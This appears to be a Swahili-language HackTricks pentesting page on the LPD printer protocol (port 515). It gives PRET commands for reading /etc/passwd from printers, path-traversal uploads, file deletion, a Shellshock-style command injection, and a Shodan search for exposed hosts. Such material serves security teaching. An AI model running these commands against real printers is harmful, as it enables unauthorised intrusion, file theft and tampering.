tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Utangulizi wa Protokali ya LPD
Katika miaka ya 1980, Line Printer Daemon (LPD) protocol ilitengenezwa katika Berkeley Unix, ambayo baadaye ilithibitishwa kupitia RFC1179. Protokali hii inafanya kazi kupitia port 515/tcp, ikiruhusu mwingiliano kupitia amri ya lpr
. Kiini cha kuchapisha kupitia LPD kinahusisha kutuma faili ya udhibiti (ili kubainisha maelezo ya kazi na mtumiaji) pamoja na faili ya data (ambayo ina habari za uchapishaji). Wakati faili ya udhibiti inaruhusu uchaguzi wa aina mbalimbali za faili kwa faili ya data, usimamizi wa faili hizi unategemea utekelezaji maalum wa LPD. Utekelezaji unaotambulika sana kwa mifumo kama Unix ni LPRng. Kwa kuzingatia, protokali ya LPD inaweza kutumika vibaya kutekeleza PostScript mbaya au kazi za uchapishaji za PJL.
Zana za Kuingiliana na Printer za LPD
PRET inatoa zana mbili muhimu, lpdprint
na lpdtest
, zinazotoa njia rahisi ya kuingiliana na printer zinazofaa LPD. Zana hizi zinaruhusu aina mbalimbali za vitendo kutoka kuchapisha data hadi kubadilisha faili kwenye printer, kama kupakua, kupakia, au kufuta:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Kwa watu binafsi wanaovutiwa na kuchunguza zaidi ulimwengu wa printer hacking, rasilimali kamili inaweza kupatikana hapa: Hacking Printers.
Shodan
port 515
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.